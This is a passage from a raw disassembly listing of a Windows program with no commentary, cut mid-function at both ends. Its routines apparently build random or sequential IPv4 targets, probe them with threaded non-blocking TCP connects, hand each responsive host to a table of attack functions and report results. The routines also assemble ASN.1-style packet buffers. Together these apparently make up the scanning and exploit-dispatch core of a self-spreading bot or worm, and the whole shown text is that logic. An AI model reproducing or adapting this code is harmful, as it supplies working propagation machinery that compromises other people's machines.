loc_40C263: ; CODE XREF: sub_40BD91+14�j
; sub_40BD91+25�j ...
pop esi
pop ebx
leave
retn
sub_40BD91 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40C267(int Dst)
sub_40C267 proc near ; CODE XREF: sub_40C3E8:loc_40C459�p
Dst = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+Dst]
push esi
push 4 ; Size
lea esi, ds:4CBB20h[eax*8]
lea eax, [ebp+Dst]
push esi ; Src
push eax ; Dst
call _memcpy
add esp, 0Ch
push [ebp+Dst]
call dword_4CB8FC ; htonl
inc eax
push eax
mov [ebp+Dst], eax
call dword_4CB9D0 ; htonl
mov [ebp+Dst], eax
lea eax, [ebp+Dst]
push 4 ; Size
push eax ; Src
push esi ; Dst
call _memcpy
mov eax, [esi]
add esp, 0Ch
pop esi
pop ebp
retn
sub_40C267 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40C2AF(char *Src,int)
sub_40C2AF proc near ; CODE XREF: sub_40C3E8+69�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
Src = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
or esi, 0FFFFFFFFh
push [ebp+Src] ; Str
mov [ebp+var_C], esi
mov [ebp+var_8], esi
mov [ebp+var_4], esi
mov [ebp+var_10], esi
call _strlen
cmp eax, 0Fh
pop ecx
jbe short loc_40C2D7
xor eax, eax
jmp short loc_40C348
; ---------------------------------------------------------------------------
loc_40C2D7: ; CODE XREF: sub_40C2AF+22�j
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_C]
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
push [ebp+Src] ; Src
call _sscanf
add esp, 18h
cmp [ebp+var_C], esi
jnz short loc_40C304
call _rand
mov [ebp+var_C], eax
loc_40C304: ; CODE XREF: sub_40C2AF+4B�j
cmp [ebp+var_8], esi
jnz short loc_40C311
call _rand
mov [ebp+var_8], eax
loc_40C311: ; CODE XREF: sub_40C2AF+58�j
cmp [ebp+var_4], esi
jnz short loc_40C31E
call _rand
mov [ebp+var_4], eax
loc_40C31E: ; CODE XREF: sub_40C2AF+65�j
mov eax, [ebp+var_10]
cmp eax, esi
jnz short loc_40C32A
call _rand
loc_40C32A: ; CODE XREF: sub_40C2AF+74�j
shl eax, 8
add eax, [ebp+var_4]
mov ecx, [ebp+var_C]
shl eax, 8
add eax, [ebp+var_8]
shl eax, 8
add eax, ecx
mov ecx, [ebp+arg_4]
mov dword_4CBB20[ecx*8], eax
loc_40C348: ; CODE XREF: sub_40C2AF+26�j
pop esi
leave
retn
sub_40C2AF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C34B proc near ; CODE XREF: sub_40BB65+59�p
; sub_40C3E8+BB�p ...
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 120h
push ebx
push esi
push edi
push 1
pop edi
xor ebx, ebx
push ebx
push edi
push 2
mov [ebp+var_4], edi
call dword_4CBA54 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_40C374
xor eax, eax
jmp short loc_40C3E3
; ---------------------------------------------------------------------------
loc_40C374: ; CODE XREF: sub_40C34B+23�j
mov eax, [ebp+arg_0]
push [ebp+arg_4]
mov [ebp+var_1C], 2
mov [ebp+var_18], eax
call dword_4CB9D4 ; htons
mov [ebp+var_1A], ax
lea eax, [ebp+var_4]
push eax
push 8004667Eh
push esi
call dword_4CBA70 ; ioctlsocket
lea eax, [ebp+var_1C]
push 10h
push eax
push esi
call dword_4CB97C ; connect
mov eax, [ebp+arg_8]
mov [ebp+var_8], ebx
mov [ebp+var_C], eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_120]
push ebx
push eax
push ebx
push ebx
mov [ebp+var_11C], esi
mov [ebp+var_120], edi
call dword_4CB9BC ; select
push esi
mov edi, eax
call dword_4CBA6C ; closesocket
xor eax, eax
cmp edi, ebx
setnle al
loc_40C3E3: ; CODE XREF: sub_40C34B+27�j
pop edi
pop esi
pop ebx
leave
retn
sub_40C34B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C3E8 proc near ; DATA XREF: sub_40C600+13B�o
var_2A8 = dword ptr -2A8h
Dest = byte ptr -28Ch
var_20C = dword ptr -20Ch
var_208 = byte ptr -208h
var_1F8 = byte ptr -1F8h
var_178 = byte ptr -178h
var_16C = dword ptr -16Ch
var_168 = dword ptr -168h
var_164 = dword ptr -164h
var_15C = dword ptr -15Ch
var_158 = dword ptr -158h
Src = byte ptr -150h
var_140 = byte ptr -140h
Str = byte ptr -0C0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 53h
mov esi, eax
pop ecx
lea edi, [ebp+Src]
rep movsd
mov esi, [ebp+var_2C]
mov dword ptr [eax+148h], 1
mov eax, [ebp+var_28]
mov [ebp+var_4], esi
mov [ebp+arg_0], eax
call ds:dword_4270B0 ; GetTickCount
push eax
call sub_41C2B8
mov ebx, esi
pop ecx
imul ebx, 234h
loc_40C42F: ; CODE XREF: sub_40C3E8+204�j
mov eax, dword_43E914[ebx]
cmp dword_4CBB24[eax*8], 0
jz loc_40C5F1
cmp [ebp+var_10], 0
push eax ; Dst
jz short loc_40C459
lea eax, [ebp+Src]
push eax ; Src
call sub_40C2AF
pop ecx
jmp short loc_40C45E
; ---------------------------------------------------------------------------
loc_40C459: ; CODE XREF: sub_40C3E8+60�j
call sub_40C267
loc_40C45E: ; CODE XREF: sub_40C3E8+6F�j
pop ecx
mov edi, eax
push [ebp+arg_0]
push dword_43E914[ebx]
push [ebp+var_3C]
push edi
call dword_4CBA60 ; inet_ntoa
push eax
lea eax, [ebp+Dest]
push offset asc_431E64 ; "-"
push eax ; Dest
call _sprintf
add esp, 18h
lea eax, [ebp+Dest]
push eax ; Format
lea eax, dword_43E710[ebx]
push eax ; Dest
call _sprintf
push [ebp+var_38]
push [ebp+var_3C]
push edi
call sub_40C34B
add esp, 14h
cmp eax, 1
jnz loc_40C5E1
cmp [ebp+var_20], 0FFFFFFFFh
jnz short loc_40C535
push offset dword_4CDB20
call ds:dword_4270DC ; RtlEnterCriticalSection
push [ebp+var_3C]
push edi
call dword_4CBA60 ; inet_ntoa
push eax
lea eax, [ebp+Dest]
push offset asc_431E3C ; "-"
push eax ; Dest
call _sprintf
add esp, 10h
cmp [ebp+var_14], 0
jnz short loc_40C517
cmp [ebp+Str], 0
push 1 ; int
push [ebp+var_18] ; int
lea eax, [ebp+Dest]
push eax ; int
lea eax, [ebp+Str]
jnz short loc_40C50B
lea eax, [ebp+var_140]
loc_40C50B: ; CODE XREF: sub_40C3E8+11B�j
push eax ; Str
push [ebp+var_40] ; int
call sub_409869
add esp, 14h
loc_40C517: ; CODE XREF: sub_40C3E8+100�j
lea eax, [ebp+Dest]
push eax
call sub_415D38
mov [esp+2A8h+var_2A8], offset dword_4CDB20
call ds:dword_4270D8 ; RtlLeaveCriticalSection
jmp loc_40C5E1
; ---------------------------------------------------------------------------
loc_40C535: ; CODE XREF: sub_40C3E8+D0�j
push edi
call dword_4CBA60 ; inet_ntoa
push eax ; Format
lea eax, [ebp+var_208]
push eax ; Dest
call _sprintf
mov eax, [ebp+var_20]
pop ecx
shl eax, 6
pop ecx
add eax, offset aSym ; "sym"
push eax ; Format
lea eax, [ebp+var_178]
push eax ; Dest
call _sprintf
cmp [ebp+Str], 0
pop ecx
pop ecx
lea eax, [ebp+Str]
jnz short loc_40C57A
lea eax, [ebp+var_140]
loc_40C57A: ; CODE XREF: sub_40C3E8+18A�j
push eax ; Format
lea eax, [ebp+var_1F8]
push eax ; Dest
call _sprintf
mov eax, [ebp+var_40]
pop ecx
mov [ebp+var_20C], eax
mov eax, [ebp+var_18]
pop ecx
mov [ebp+var_15C], eax
mov eax, [ebp+var_14]
sub esp, 0BCh
mov [ebp+var_158], eax
mov eax, [ebp+var_3C]
push 2Fh
mov [ebp+var_16C], eax
mov eax, [ebp+var_20]
pop ecx
mov [ebp+var_168], esi
mov [ebp+var_164], eax
lea esi, [ebp+var_20C]
mov edi, esp
shl eax, 6
rep movsd
call off_4317FC[eax]
mov esi, [ebp+var_4]
add esp, 0BCh
loc_40C5E1: ; CODE XREF: sub_40C3E8+C6�j
; sub_40C3E8+148�j
push 7D0h
call ds:dword_427080 ; Sleep
jmp loc_40C42F
; ---------------------------------------------------------------------------
loc_40C5F1: ; CODE XREF: sub_40C3E8+55�j
push esi
call sub_40B6D6
pop ecx
push 0
call ds:dword_4270D4 ; ExitThread
sub_40C3E8 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C600 proc near ; DATA XREF: sub_401ACD+1F2A�o
; sub_401ACD+5B7A�o
var_1DC = dword ptr -1DCh
Source = byte ptr -1CCh
var_14C = byte ptr -14Ch
Str = byte ptr -13Ch
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1CCh
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 53h
mov esi, eax
pop ecx
lea edi, [ebp+var_14C]
push 1
pop ebx
rep movsd
mov [eax+144h], ebx
lea eax, [ebp+var_14C]
push eax
call dword_4CBA14 ; inet_addr
mov ecx, [ebp+var_2C]
sub esp, 14Ch
lea esi, [ebp+var_14C]
push 53h
mov dword_4CBB20[ecx*8], eax
pop ecx
mov edi, esp
rep movsd
call sub_40BD91
push 0Bh
call sub_40B602
add esp, 150h
cmp eax, ebx
jnz short loc_40C6CE
mov esi, offset dword_4CDB20
push esi
call ds:dword_4270E4 ; RtlDeleteCriticalSection
push 80000400h
push esi
call ds:dword_4270E0 ; InitializeCriticalSectionAndSpinCount
test eax, eax
jnz short loc_40C6CE
lea eax, [ebp+Source]
push offset asc_431F48 ; "-"
push eax ; Dest
call _sprintf
xor ebx, ebx
pop ecx
cmp [ebp+var_10], ebx
pop ecx
jnz short loc_40C6B8
push ebx ; int
lea eax, [ebp+Source]
push [ebp+var_14] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_3C] ; int
call sub_409869
add esp, 14h
loc_40C6B8: ; CODE XREF: sub_40C600+99�j
lea eax, [ebp+Source]
push eax
call sub_415D38
pop ecx
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_40C6CE: ; CODE XREF: sub_40C600+63�j
; sub_40C600+7F�j
mov eax, [ebp+var_2C]
mov esi, ds:dword_427080
mov edi, ebx
mov dword_4CBB24[eax*8], ebx
xor ebx, ebx
cmp [ebp+var_20], 1
jb loc_40C79B
loc_40C6EC: ; CODE XREF: sub_40C600+195�j
push edi
lea eax, [ebp+var_14C]
push [ebp+var_2C]
mov [ebp+var_24], edi
push [ebp+var_38]
push eax
lea eax, [ebp+Source]
push offset asc_431F14 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Source]
push 0Bh ; int
push eax ; Source
call sub_40B3BA
mov [ebp+var_28], eax
imul eax, 234h
mov ecx, [ebp+var_2C]
add esp, 24h
mov dword_43E914[eax], ecx
lea eax, [ebp+var_14C]
push ebx
push ebx
push eax
push offset sub_40C3E8
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_28]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_40C766
loc_40C75B: ; CODE XREF: sub_40C600+164�j
cmp [ebp+var_4], ebx
jnz short loc_40C78D
push 1Eh
call esi ; Sleep
jmp short loc_40C75B
; ---------------------------------------------------------------------------
loc_40C766: ; CODE XREF: sub_40C600+159�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+Source]
push offset asc_431EDC ; "-"
push eax ; Dest
call _sprintf
lea eax, [ebp+Source]
push eax
call sub_415D38
add esp, 10h
loc_40C78D: ; CODE XREF: sub_40C600+15E�j
push 1Eh
call esi ; Sleep
inc edi
cmp edi, [ebp+var_20]
jbe loc_40C6EC
loc_40C79B: ; CODE XREF: sub_40C600+E6�j
cmp [ebp+var_30], ebx
jz loc_40C845
mov eax, [ebp+var_30]
imul eax, 0EA60h
push eax
call esi ; Sleep
loc_40C7B0: ; CODE XREF: sub_40C600+250�j
push [ebp+var_30]
mov eax, [ebp+var_2C]
push [ebp+var_38]
mov eax, dword_4CBB20[eax*8]
push eax
call dword_4CBA60 ; inet_ntoa
push eax
lea eax, [ebp+Source]
push offset asc_431E9C ; "-"
push eax ; Dest
call _sprintf
add esp, 14h
cmp [ebp+var_10], ebx
jnz short loc_40C7FE
push ebx ; int
lea eax, [ebp+Source]
push [ebp+var_14] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_3C] ; int
call sub_409869
add esp, 14h
loc_40C7FE: ; CODE XREF: sub_40C600+1DF�j
lea eax, [ebp+Source]
push eax
call sub_415D38
mov eax, [ebp+var_2C]
mov [esp+1DCh+var_1DC], 0BB8h
mov dword_4CBB24[eax*8], ebx
call esi ; Sleep
push 0Bh
call sub_40B602
cmp eax, 1
pop ecx
jnz short loc_40C835
push offset dword_4CDB20
call ds:dword_4270E4 ; RtlDeleteCriticalSection
loc_40C835: ; CODE XREF: sub_40C600+228�j
push [ebp+var_2C]
call sub_40B6D6
pop ecx
push ebx
call ds:dword_4270D4 ; ExitThread
loc_40C845: ; CODE XREF: sub_40C600+19E�j
; sub_40C600+25D�j
mov eax, [ebp+var_2C]
cmp dword_4CBB24[eax*8], 1
jnz loc_40C7B0
push 7D0h
call esi ; Sleep
jmp short loc_40C845
sub_40C600 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C85F proc near ; DATA XREF: sub_40C92C+7B�o
; sub_40CA1D+7B�o
var_BC = dword ptr -0BCh
Str = byte ptr -0B8h
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
Dst = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0BCh
mov eax, [ebp+arg_0]
push esi
push edi
push 2Bh
pop ecx
mov esi, eax
lea edi, [ebp+var_BC]
push 1
rep movsd
pop esi
mov [eax+0A8h], esi
push 10h ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+var_38]
call dword_4CB9D4 ; htons
mov [ebp+var_E], ax
mov eax, [ebp+var_28]
push 6
push esi
push 2
mov [ebp+var_C], eax
call dword_4CBA54 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_40C91D
lea eax, [ebp+Dst]
push 10h
push eax
push esi
call dword_4CB97C ; connect
mov ecx, [ebp+var_2C]
imul ecx, 234h
cmp eax, 0FFFFFFFFh
mov dword_43E91C[ecx], esi
jz short loc_40C91D
push [ebp+var_38]
push [ebp+var_28]
call dword_4CBA60 ; inet_ntoa
push eax
mov edi, offset byte_4CE4E4
push offset asc_431F7C ; "-"
push edi ; Dest
call _sprintf
push 0 ; int
lea eax, [ebp+Str]
push [ebp+var_20] ; int
push edi ; int
push eax ; Str
push [ebp+var_BC] ; int
call sub_409869
push edi
call sub_415D38
add esp, 28h
loc_40C91D: ; CODE XREF: sub_40C85F+5D�j
; sub_40C85F+7E�j
push esi
call dword_4CBA6C ; closesocket
pop edi
xor eax, eax
pop esi
leave
retn 4
sub_40C85F endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
; int __cdecl sub_40C92C(int Dst)
sub_40C92C proc near ; DATA XREF: sub_401ACD+5F60�o
Dest = byte ptr -134h
var_B4 = byte ptr -0B4h
var_30 = dword ptr -30h
var_24 = dword ptr -24h
Src = dword ptr -20h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
Dst = dword ptr 8
push ebp
mov ebp, esp
sub esp, 134h
push ebx
mov ebx, [ebp+Dst]
push esi
push edi
push 2Bh
mov esi, ebx
pop ecx
lea edi, [ebp+var_B4]
rep movsd
mov esi, ds:dword_427080
mov dword ptr [ebx+0A4h], 1
xor edi, edi
loc_40C95A: ; CODE XREF: sub_40C92C+EC�j
push [ebp+var_30]
push [ebp+Src]
call dword_4CBA60 ; inet_ntoa
push eax
lea eax, [ebp+Dest]
push offset asc_431FA4 ; "-"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dest]
push 1FFh ; Count
push eax ; Source
mov eax, [ebp+var_24]
imul eax, 234h
add eax, offset dword_43E710
push eax ; Dest
call _strncpy
add esp, 1Ch
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_B4]
push edi
push eax
push offset sub_40C85F
push edi
push edi
call ds:dword_427084 ; CreateThread
cmp eax, edi
mov [ebp+var_4], eax
jz short loc_40C9C6
loc_40C9BB: ; CODE XREF: sub_40C92C+98�j
cmp [ebp+var_C], edi
jnz short loc_40C9C6
push 32h
call esi ; Sleep
jmp short loc_40C9BB
; ---------------------------------------------------------------------------
loc_40C9C6: ; CODE XREF: sub_40C92C+8D�j
; sub_40C92C+92�j
push [ebp+var_4]
call ds:dword_427070 ; CloseHandle
push dword ptr [ebx+8Ch]
mov [ebx+0A8h], edi
call esi ; Sleep
lea eax, [ebp+Src]
push 4 ; Size
push eax ; Src
lea eax, [ebp+Dst]
push eax ; Dst
call _memcpy
add esp, 0Ch
push [ebp+Dst]
call dword_4CB8FC ; htonl
inc eax
push eax
mov [ebp+Dst], eax
call dword_4CB9D0 ; htonl
mov [ebp+Dst], eax
lea eax, [ebp+Dst]
push 4 ; Size
push eax ; Src
lea eax, [ebp+Src]
push eax ; Dst
call _memcpy
add esp, 0Ch
jmp loc_40C95A
sub_40C92C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CA1D proc near ; DATA XREF: sub_401ACD+5C80�o
Dest = byte ptr -130h
var_B0 = dword ptr -0B0h
Str = byte ptr -0ACh
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 130h
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
push 2Bh
mov esi, ebx
pop ecx
lea edi, [ebp+var_B0]
rep movsd
mov esi, ds:dword_427080
mov dword ptr [ebx+0A4h], 1
xor edi, edi
loc_40CA4B: ; CODE XREF: sub_40CA1D+BC�j
push [ebp+var_2C]
push [ebp+var_1C]
call dword_4CBA60 ; inet_ntoa
push eax
lea eax, [ebp+Dest]
push offset asc_431FF8 ; "-"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dest]
push 1FFh ; Count
push eax ; Source
mov eax, [ebp+var_20]
imul eax, 234h
add eax, offset dword_43E710
push eax ; Dest
call _strncpy
add esp, 1Ch
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_B0]
push edi
push eax
push offset sub_40C85F
push edi
push edi
call ds:dword_427084 ; CreateThread
cmp eax, edi
mov [ebp+arg_0], eax
jz short loc_40CAB7
loc_40CAAC: ; CODE XREF: sub_40CA1D+98�j
cmp [ebp+var_8], edi
jnz short loc_40CAB7
push 32h
call esi ; Sleep
jmp short loc_40CAAC
; ---------------------------------------------------------------------------
loc_40CAB7: ; CODE XREF: sub_40CA1D+8D�j
; sub_40CA1D+92�j
push [ebp+arg_0]
call ds:dword_427070 ; CloseHandle
push dword ptr [ebx+8Ch]
mov [ebx+0A8h], edi
call esi ; Sleep
mov eax, [ebp+var_2C]
cmp eax, [ebp+var_28]
jz short loc_40CADE
inc [ebp+var_2C]
jmp loc_40CA4B
; ---------------------------------------------------------------------------
loc_40CADE: ; CODE XREF: sub_40CA1D+B7�j
push [ebp+var_1C]
call dword_4CBA60 ; inet_ntoa
push eax
lea eax, [ebp+Dest]
push offset asc_431FCC ; "-"
push eax ; Dest
call _sprintf
push edi ; int
lea eax, [ebp+Dest]
push [ebp+var_14] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_B0] ; int
call sub_409869
push [ebp+var_20]
call sub_40B6D6
add esp, 24h
xor eax, eax
pop edi
pop esi
pop ebx
leave
retn 4
sub_40CA1D endp
; =============== S U B R O U T I N E =======================================
sub_40CB2A proc near ; CODE XREF: sub_40CD9E+E�p
; sub_40CD9E+33�p ...
mov eax, ecx
and dword ptr [eax+4], 0
and dword ptr [eax], 0
retn
sub_40CB2A endp
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_40CB34(void *Src,size_t Size)
sub_40CB34 proc near ; CODE XREF: sub_40CD9E+11E�p
Src = dword ptr 4
Size = dword ptr 8
push ebx
mov ebx, [esp+4+Size]
push esi
push edi
mov esi, ecx
push ebx ; Size
call _malloc
mov edi, eax
pop ecx
test edi, edi
jz short loc_40CB66
push ebx ; Size
push 0 ; Val
push edi ; Dst
call _memset
push ebx ; Size
push [esp+1Ch+Src] ; Src
push edi ; Dst
call _memcpy
add esp, 18h
mov [esi+4], ebx
mov [esi], edi
loc_40CB66: ; CODE XREF: sub_40CB34+14�j
mov eax, esi
pop edi
pop esi
pop ebx
retn 8
sub_40CB34 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_40CB6E(void *Src,size_t Size,int,int)
sub_40CB6E proc near ; CODE XREF: sub_40CC68+18�p
; sub_40CCE2+16�p ...
Src = dword ptr 8
Size = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, [ebp+Size]
push ebx
mov ebx, ecx
push esi
mov ecx, [ebp+arg_C]
push edi
lea edi, [eax+ecx]
push edi ; Size
call _malloc
mov esi, eax
pop ecx
test esi, esi
jz short loc_40CBBA
push edi ; Size
push 0 ; Val
push esi ; Dst
call _memset
push [ebp+Size] ; Size
push [ebp+Src] ; Src
push esi ; Dst
call _memcpy
push [ebp+arg_C] ; Size
mov eax, [ebp+Size]
add eax, esi
push [ebp+arg_8] ; Src
push eax ; Dst
call _memcpy
add esp, 24h
mov [ebx+4], edi
mov [ebx], esi
loc_40CBBA: ; CODE XREF: sub_40CB6E+1C�j
pop edi
mov eax, ebx
pop esi
pop ebx
pop ebp
retn 10h
sub_40CB6E endp
; =============== S U B R O U T I N E =======================================
sub_40CBC3 proc near ; CODE XREF: sub_40CC68+5E�p
; sub_40CC68+6F�p ...
push esi
mov esi, ecx
mov eax, [esi]
test eax, eax
jz short loc_40CBD3
push eax
call sub_41BA91
pop ecx
loc_40CBD3: ; CODE XREF: sub_40CBC3+7�j
and dword ptr [esi+4], 0
and dword ptr [esi], 0
pop esi
retn
sub_40CBC3 endp
; =============== S U B R O U T I N E =======================================
sub_40CBDC proc near ; CODE XREF: sub_40CC68+20�p
; sub_40CD43+8�p ...
push ebx
push esi
mov esi, ecx
push edi
mov eax, [esi+4]
cmp eax, 0FFFFh
jge short loc_40CC09
xor ebx, ebx
cmp eax, 7Fh
setnl bl
dec ebx
and ebx, 0FFFFFFFEh
add ebx, 3
add eax, ebx
push eax ; Size
call _malloc
mov edi, eax
pop ecx
test edi, edi
jnz short loc_40CC0D
loc_40CC09: ; CODE XREF: sub_40CBDC+D�j
xor al, al
jmp short loc_40CC64
; ---------------------------------------------------------------------------
loc_40CC0D: ; CODE XREF: sub_40CBDC+2B�j
mov eax, ebx
add eax, [esi+4]
push eax ; Size
push 0 ; Val
push edi ; Dst
call _memset
add esp, 0Ch
cmp ebx, 1
jnz short loc_40CC32
mov al, [esi+4]
mov [edi], al
push dword ptr [esi+4]
lea eax, [edi+1]
push dword ptr [esi]
jmp short loc_40CC4C
; ---------------------------------------------------------------------------
loc_40CC32: ; CODE XREF: sub_40CBDC+45�j
mov byte ptr [edi], 82h
mov eax, [esi+4]
sar eax, 8
mov [edi+1], al
mov al, [esi+4]
mov [edi+2], al
push dword ptr [esi+4] ; Size
lea eax, [edi+3]
push dword ptr [esi] ; Src
loc_40CC4C: ; CODE XREF: sub_40CBDC+54�j
push eax ; Dst
call _memcpy
add esp, 0Ch
push dword ptr [esi]
call sub_41BA91
add [esi+4], ebx
pop ecx
mov [esi], edi
mov al, 1
loc_40CC64: ; CODE XREF: sub_40CBDC+2F�j
pop edi
pop esi
pop ebx
retn
sub_40CBDC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CC68 proc near ; CODE XREF: sub_40CD9E+89�p
; sub_40CD9E+E3�p ...
Src = dword ptr -8
Size = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
push edi
lea ecx, [ebp+Src]
push dword ptr [esi+4] ; int
push dword ptr [esi] ; int
push 1 ; Size
push offset word_4CB88C ; Src
call sub_40CB6E
lea ecx, [ebp+Src]
call sub_40CBDC
mov eax, [ebp+Size]
inc eax
push eax ; Size
call _malloc
mov edi, eax
pop ecx
test edi, edi
jnz short loc_40CCA2
xor al, al
jmp short loc_40CCDE
; ---------------------------------------------------------------------------
loc_40CCA2: ; CODE XREF: sub_40CC68+34�j
mov eax, [ebp+Size]
inc eax
push eax ; Size
push 0 ; Val
push edi ; Dst
call _memset
mov byte ptr [edi], 3
push [ebp+Size] ; Size
lea eax, [edi+1]
push [ebp+Src] ; Src
push eax ; Dst
call _memcpy
add esp, 18h
mov ecx, esi
call sub_40CBC3
mov eax, [ebp+Size]
lea ecx, [ebp+Src]
inc eax
mov [esi], edi
mov [esi+4], eax
call sub_40CBC3
mov al, 1
loc_40CCDE: ; CODE XREF: sub_40CC68+38�j
pop edi
pop esi
leave
retn
sub_40CC68 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CCE2 proc near ; CODE XREF: sub_40CD16+14�p
; sub_40CD33+8�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
push [ebp+arg_4] ; int
lea ecx, [ebp+var_8]
push [ebp+arg_0] ; int
push dword ptr [esi+4] ; Size
push dword ptr [esi] ; Src
call sub_40CB6E
mov ecx, esi
call sub_40CBC3
mov eax, [ebp+var_8]
mov [esi], eax
mov eax, [ebp+var_4]
mov [esi+4], eax
mov al, 1
pop esi
leave
retn 8
sub_40CCE2 endp
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_40CD16(char *Str)
sub_40CD16 proc near ; CODE XREF: sub_40CD9E+F0�p
; sub_40CD9E+15B�p ...
Str = dword ptr 4
push esi
mov esi, ecx
push [esp+4+Str] ; Str
call _strlen
pop ecx
push eax
mov ecx, esi
push [esp+8+Str]
call sub_40CCE2
pop esi
retn 4
sub_40CD16 endp
; =============== S U B R O U T I N E =======================================
sub_40CD33 proc near ; CODE XREF: sub_40CD7F+B�p
; sub_40CD9E+1A1�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_40CCE2
retn 8
sub_40CD33 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CD43 proc near ; CODE XREF: sub_40CD7F+16�p
; sub_40CD9E+91�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
call sub_40CBDC
test al, al
jz short loc_40CD7C
push dword ptr [esi+4] ; int
lea ecx, [ebp+var_8]
push dword ptr [esi] ; int
push 1 ; Size
push offset asc_42CC80 ; "#"
call sub_40CB6E
mov ecx, esi
call sub_40CBC3
mov eax, [ebp+var_8]
mov [esi], eax
mov eax, [ebp+var_4]
mov [esi+4], eax
mov al, 1
loc_40CD7C: ; CODE XREF: sub_40CD43+F�j
pop esi
leave
retn
sub_40CD43 endp
; =============== S U B R O U T I N E =======================================
sub_40CD7F proc near ; CODE XREF: sub_40CD9E+134�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, ecx
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_40CD33
test al, al
jz short loc_40CD9A
mov ecx, esi
call sub_40CD43
loc_40CD9A: ; CODE XREF: sub_40CD7F+12�j
pop esi
retn 8
sub_40CD7F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CD9E proc near ; CODE XREF: .text:0040D625�p
Dst = byte ptr -858h
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
